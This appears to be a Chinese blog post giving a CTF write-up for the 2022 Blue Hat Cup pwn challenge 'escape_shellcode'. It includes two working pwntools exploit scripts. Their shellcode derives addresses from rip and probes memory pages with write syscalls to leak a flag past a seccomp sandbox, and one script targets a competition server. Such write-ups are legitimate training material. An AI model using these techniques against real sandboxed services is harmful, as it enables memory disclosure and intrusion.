第六届蓝帽杯 EscapeShellcode

最新推荐文章于 2024-07-23 17:45:23 发布
最新推荐文章于 2024-07-23 17:45:23 发布
阅读量177 收藏
点赞数 1
分类专栏: pwn刷题wp 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65147345/article/details/125835702
版权

程序分析

在这里插入图片描述

init_io()函数:初始化输入输出流

init_mem()函数:给了一片可以执行的空间
在这里插入图片描述


在这里程序还写了一段代码进去,这样看也不知道他到底干了什么。


在这里插入图片描述

sandbox()函数:开始沙盒,具体限制如下:


在这里插入图片描述

go()函数:让我们从heap_men+170开始写入内容(shellcode),然后执行heap_mem里面的内容,先执行完程序之前写的内容
在这里插入图片描述

#寻找思路

通过调试我们发现之前执行完的效果是:
在这里插入图片描述

**我们可以通过这个read函数,写入gadget执行,但是唯一保留程序真正地址的寄存器只有rip保留着真实地址**

我们可以考虑通过rip的地址盲write,一直尝试知道输出flag

exp

from pwn import*
#from LibcSearcher import *
#io = process('./escape_shellcode')
elf = ELF('./escape_shellcode')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context(log_level='debug',os='linux',arch='amd64')


#gdb.attach(io,'b &*$rebase(0x1367)')

for i in range(99999):#便利次数
	io = remote("39.107.108.120",12773)
	
	sleep(0.1)
	a = 0x1000 * i
	print(hex(a))

	shellcode = '''
	lea r13, [rip]
	sub r13, 0x351#只是让输出的内容调整一下位置
	add r13, 0x120#只是让输出的内容调整一下位置
	sub r13, '''+str(a)+'''
	#write系统号调用准备
	mov rdi, 1
	mov rsi, r13
	mov rax, 1
	mov rdx, 0xff
	syscall
	'''
	#0x0067616c662f2e
	#0x55b573fcdb18
	#0x55b595adf120
	#0x18aa000
	io.sendline(asm(shellcode))
	io.interactive()
	io.close()

我们也可以通过rip的地址对其进行地位抹除操作,然后以页为单位,使用write寻找第一个可以输出的页,然后+flag的偏移就可以拿到flag了

from pwn import *  
sh = process("./escape_shellcode")  
context.update(os='linux',arch='amd64',log_level='debug')

  
  
shellcode = '''  
  
mov edi, 1  
  
lea r13, [rip]  
  
and r13, 0xfffffffff00000#只要我们保留的位数,不放心可以多补几个0  
  
mov edx, 0x50  
  
test1:  
  
add r13, 0x1000  

mov eax, 1  
  
syscall  
  
test eax, eax  
  
jng test1 #输出失败继续测试
  
add r13, 0x4120#flag的偏移

mov rsi,r13
  
mov rdx, 0xff
  
mov edi, 1  
  
mov eax, 1  
  
syscall  
  
'''  
  
print(shellcode)  
  
py = asm(shellcode)  
  
sh.sendline(py)  
  
sh.interactive()

可能大家会有疑惑为啥,第一个遇到的可读的就是我们要找的地址呢?如下图所示,我们要找的基地址就是图中的第一个地址,他是程序开始的地址,就是会首先遍历到他,那么write成功的时候就拿到基地址了+flag write就ok了
在这里插入图片描述

Mauricio_Davis
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022 蓝帽杯 初赛wp
weixin_46483787的博客
07-11 526
蓝帽杯部分wp
vbs shellcode转换escape加密
09-06
用vbs转换加密代码
第六届蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
个人博客:https://www.mrzry.top
07-09 3750
第六届蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
蓝帽杯2022 pwn escape_shellcode
z1r0的博客
07-11 398
shellcode题 只允许使用read和write,但是程序在开始的时候将flag读取到了bss段上 并且在调用shellcode之前还将寄存器的值都给清理掉了。 因为程序开了pie所以直接使用flag地址行不通。那就需要思考一下如何泄露出flag地址。 这里可以借助fs寄存器来得到有关text段的地址,再算出flag地址即可。 fs寄存器用于保存线程局部存储TLS,TLS主要是为了避免多个线程访问同一全局变量或静态变量所导致的冲突。所以fs寄存器周围会有线程地址。在笔者调试的时候发现在0x300
php中{$msg|escape},PHP-escapeshell-命令执行
weixin_42511512的博客
03-10 230
最近审计 PHP 时,频繁出现的escapeshellarg与escapeshellcmd成功勾起了我的性致兴趣,深入了解后发现确实漏洞百出Know it then do itescapeshellargstring escapeshellarg ( string $arg )转义字符串 $arg 中的单引号并使用单引号包裹此部分使得 $arg 只能传递一个参数,且不能执行不同的命令escape...
bash shell 通过Escape序列设置文字格式
wanghuiict 的CSDN博客
06-06 1458
为了命令行输出更加有辨识度,shell脚本需要对输出进行格式化。例如,借助escape序列,设定文字的颜色;通过其他ascii控制字符\r,\b等,控制文字的输出,等等。 Escape序列 escape序列是一个相当古老的ANSI标准,基本所有的Unix/Linux terminal都支持escape序列。escape序列以八进制\033即ESC的ASCII码开头,主要用来控制字体的颜色和其他...
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 2950
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
2022第六届蓝帽杯初赛writeup
qq_49422880的博客
07-10 1943
Writeup
【电子取证】网站取证(第六届蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届蓝帽杯”全国大学生网络安全技能大赛中,参赛者可能需要掌握这项技术来解决实际问题。电子取证,也被称为数字取证,是指在法律允许的范围内,对电子设备中的数据进行收集、分析、验证,以获取与法律纠纷或...
【电子取证】计算机取证(第六届蓝帽杯“全国大学生网络安全技能大赛)
07-13
第六届"蓝帽杯"全国大学生网络安全技能大赛正是这样一个平台,旨在培养和挖掘大学生在网络安全,尤其是电子取证方面的能力与潜力。 电子取证,或称数字取证,是指在法律框架下,对电子设备中的数据进行收集、分析、...
【电子取证】手机取证(第六届蓝帽杯“全国大学生网络安全技能大赛).7z.002
07-13
第六届蓝帽杯“全国大学生网络安全技能大赛
【MISC】domainhacker(第六届蓝帽杯“全国大学生网络安全技能大赛)
07-11
【MISC】domainhacker是第六届蓝帽杯”全国大学生网络安全技能大赛中的一项挑战,这类比赛通常旨在提升参赛者在网络安全领域的技能和知识。在这样的竞赛中,参赛团队需要解决各种安全问题,包括漏洞挖掘、逆向工程...
【电子取证】程序分析(第六届蓝帽杯“全国大学生网络安全技能大赛)
07-12
第六届蓝帽杯“全国大学生网络安全技能大赛
2021蓝帽杯总决赛wp
onl_llo的博客
08-30 1260
2021蓝帽杯总决赛wp pwn secretcode 程序分析 只允许open和read read的fd >= 0x14 shellcode的限制: 不能有00, 会被strcpy截断 调⽤shellcode时, rax r10执⾏shellcode 思路: 侧信道泄露flag 先多次open让flag对应的fd为0x14 然后read读⼊⽂件内容到rsp处 爆破[rsp+idx]处的字符, 如果为C, 则死循环, 否则就触发⼀个SIGV 细节: 构造"flag": mov eax, "fl
2021第五届蓝帽杯初赛部分题目wp
qq_43678263的博客
04-29 5943
文章目录前言WEBBall_siginPWNslientMISC冬奥会_is_coming 前言 本次蓝帽杯初赛做出了三道解出人数最多的题,勉强混个线下。但不得不吐槽一下这届题目。冬奥会这题杂项套了100层娃,头都绕晕了;PWN题的slient是2020年蓝帽杯决赛原题。其他题没做出来,没有发言权。 WEB Ball_sigin 签到题,用手机打开,填补3次左上角空缺的单词,完成滑雪游戏即得到flag flag{3b2e48de-e328-4267-a8d6-8d17fb3c8889} PWN sl
Linux:基础命令学习
qq_55038440的博客
07-20 1246
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
Linux】条件变量及生产者消费者模型
最新发布
2301_78636079的博客
07-23 964
条件变量与生产消费者模型
2023蓝帽杯初赛misc下载
12-04
2023蓝帽杯初赛misc下载是指在2023年举办的蓝帽杯网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手需要前往蓝帽杯竞赛官方网站或相关论坛查找与初赛misc下载相关的公告或指引。这些网站通常会提供下载链接或资源分享的方式,以方便选手获取题目所需的文件或资源。 其次,根据所提供的下载链接,选手可以点击链接进行下载,也可以使用迅雷、qq旋风等下载工具进行高速下载,以确保下载的文件完整和无误。 在完成下载后,选手需要对下载的文件进行验证。可使用md5校验工具对下载后的文件进行校验,以确保文件的完整性和正确性,防止下载过程中出现错误导致文件损坏。 之后,选手可以开始进行miscellaneous题目的解析和答题。首先,解压下载的文件,查看所提供的题目资源、源代码或二进制文件等。根据题目要求和提示,选手可以使用各种工具和技术,如逆向工程、数据分析、密码学等,进行问题的分析和解决,并找出相应的答案或flag。 最后,选手需要将自己的解题过程、思路和答案记录下来,并按照比赛规则的要求提交答案。可以是一个文本文件或截图,或是将解决问题的代码或脚本提交到竞赛平台或指定的邮箱中。 总之,2023蓝帽杯初赛misc下载是参赛选手在参加蓝帽杯网络安全竞赛中所需进行的一项任务。选手需要在蓝帽杯官方网站或相关论坛上获取下载链接并下载题目相关的文件或资源,然后对其进行验证、解析和解决,最后提交答案以完成竞赛的要求。这项任务对选手的网络安全技术、解题思维和团队合作能力都提出了较高的要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值